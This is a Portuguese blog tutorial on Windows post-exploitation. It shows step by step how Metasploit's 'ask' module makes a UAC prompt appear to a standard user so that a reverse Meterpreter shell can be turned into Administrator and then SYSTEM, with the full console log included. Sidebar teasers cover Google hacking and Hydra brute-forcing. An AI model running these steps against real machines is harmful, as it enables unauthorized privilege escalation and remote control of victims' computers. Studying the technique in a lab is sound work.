Pular para o conteúdo principal

Seguidores

bypass uac windows

Suponha que invadiu um computador, onde reparou que o usuário que estava logado, era um usuário comum ou seja não era administrador do sistema. Talvez realizou várias tentativas de ataques procurando paths vulneráveis a escalação de privilégios porém sem sucesso.

Em ultimo caso, se não houver nenhuma vulnerabilidades de escalação de privilégios, é obter o privilegio de sistema interagindo com o usuário. Em tecnologia esta técnica é chamada de engenharia social. Onde iremos enviar uma requisição via UAC para o usuario, caso recebermos a resposta com as informações necessárias, conseguiremos o usuário administrator e com isso será bem fácil obter privilegio de sistema.

Abaixo vou estar demonstrando e explicando sobre cada passo realizado.

É importante ressaltar que para seguir os passos citados abaixo, você já deve ter o acesso da máquina e está com a sessão do meterpreter em aberto, pois este lab é baseado em pós-exploração.
escala de privilegios windows
orientaçãoemtecnologia.com



















  • 1º passo: usar o exploit de ask para solicitar a senha adminitrativa via UAC ao usuario "use exploit/windows/local/ask".
  • 2º passo: Realizar configurações de sessões, host local e porta local. No meu caso configurei na sessão 5, pois o meterpreter está na sessão 5. configurei o lhost no ip do meu kali e configurei a porta 10 para a escuta.
  • 3º passo: Após configurações e set, digite o comando exploit para iniciar o processo de exploração com UAC.
  • 4º passo: Após receber a sessão do meterpreter, digite getsystem para obter o privilégio de sistema.

windows privilege escalation


msf exploit(windows/local/ask) > sessions 5
[*] Starting interaction with 5...
meterpreter > getuid
Server username: WIN-MPA05BP9C25\usuario comum
meterpreter >
msf exploit(windows/local/ask) > sessions -l
Active sessions
===============
  Id  Name  Type                     Information                                      Connection
  --  ----  ----                     -----------                                      ----------
  5         meterpreter x86/windows  WIN-MPA05BP9C25\usuario comum @ WIN-MPA05BP9C25  192.168.190.134:2 -> 192.168.190.128:49511 (192.168.190.128)
msf exploit(windows/local/ask) > use exploit/windows/local/ask 
msf exploit(windows/local/ask) > show options 
Module options (exploit/windows/local/ask):
   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   FILENAME                    no        File name on disk
   PATH                        no        Location on disk, %TEMP% used if not set
   SESSION    2                yes       The session to run this module on.
   TECHNIQUE  EXE              yes       Technique to use (Accepted: PSH, EXE)
Payload options (windows/meterpreter/reverse_tcp):
   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.190.134  yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port
Exploit target:
   Id  Name
   --  ----
   0   Windows
msf exploit(windows/local/ask) > set session 5
session => 5
msf exploit(windows/local/ask) > set lport 10
lport => 10
msf exploit(windows/local/ask) > exploit
[*] Started reverse TCP handler on 192.168.190.134:10 
[*] UAC is Enabled, checking level...
[*] The user will be prompted, wait for them to click 'Ok'
[*] Uploading gHuEgWSBCBok.exe - 73802 bytes to the filesystem...
[*] Executing Command!
[*] Sending stage (179779 bytes) to 192.168.190.128
[*] Meterpreter session 6 opened (192.168.190.134:10 -> 192.168.190.128:49599) at 2020-01-31 23:46:06 -0200
meterpreter > 
meterpreter > getuid
Server username: WIN-MPA05BP9C25\Administrador
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: AUTORIDADE NT\SISTEMA
meterpreter > 

Postagens mais visitadas deste blog

google hacking comandos

O mecanismo de pesquisa do Google encontrado em www.google.com oferece muitos recursos diferentes incluindo tradução de idiomas e documentos, web, imagem, grupos de notícias, catálogo e pesquisas de notícias e muito mais. Esses recursos oferecem benefícios óbvios, mesmo para os mais internauta não iniciada, mas esses mesmos recursos permitem possibilidades muito mais nefastas  para os usuários mais maliciosos da Internet, incluindo hackers, criminosos de computador, identidade ladrões e até terroristas.  Este artigo descreve as aplicações mais nefastas do Mecanismo de pesquisa do Google, técnicas que foram coletivamente denominadas "hackers do Google ou Google Docker". Os códigos demonstrado logo abaixo tem o objetivo de mostrar tecnicas que são ultizados pelo google hacking para exploração de vulnerabilidades em determinado sistema. Qualquer técnica demonstrado aqui e que for usado contra sistema cuja não tem autorização para realizar este tipo de testes, é c

Zoom corrige vulnerabilidade PARA WINDOWS

Zoom corrige vulnerabilidade O Zoom anunciou ter corrigido uma nova falha de segurança que poderia permitir aos cibercriminosos criar links falsos de reuniões online, direcionando as vítimas para golpes de phishing. A vulnerabilidade permitia aos usuários corporativos gerar links personalizados para reuniões, como por exemplo “suaempresa.zoom.us”, e utilizá-los para convidar os participantes. Ela poderia ser explorada de duas maneiras, de acordo com a equipe de especialistas Em um dos cenários, os hackers tinham a possibilidade de alterar a URL personalizada, incluindo um link direto para uma conferência virtual falsa, sem que os convidados notassem a diferença. O outro envolvia o uso da interface web personalizada do Zoom, inserindo nela um link malicioso. ZOOM lança patch de correção Windows No dia 10 de julho de 2020 a EMPRESA Zoom lança uma nova versão para correção de vulnerabilidade para sistema operacional Windows Lançamento atual Data do lançamento: 10

Quebrar senha com hydra

THC Hydra é uma ferramenta utilizada para quebras de senhas com a versão unica e gratuita. É considerada entre uma das melhores ferramentas de quebras de senhas para comunicação em redes . Objetivo deste artigo é mostrar o funcionamento técnico desta ferramenta, quais comandos devem ser digitados para realizarem um brute force atacck. Pois dependendo do sistema a qual deseja descobrir a senha, as técnicas são totalmente diferentes. A seguir vamos citar e exemplificar os tipos de ataque realizado em cada sistemas. Também é importante ressaltar que, esta ferramenta é bem compreensível e ágil quando falamos em ataque a força bruta para descobertas de senhas. Hydra Brute force Attack Ataque de Força Bruta Brute Force Attack é conhecido pelo nome de ataque a força bruta, ou seja o ataque será realizado com base em Wordlist que contém as principais palavras chaves a qual o atacante ache que a vitima utiliza para logar em determinado sistema. É considerado um tipo de ataque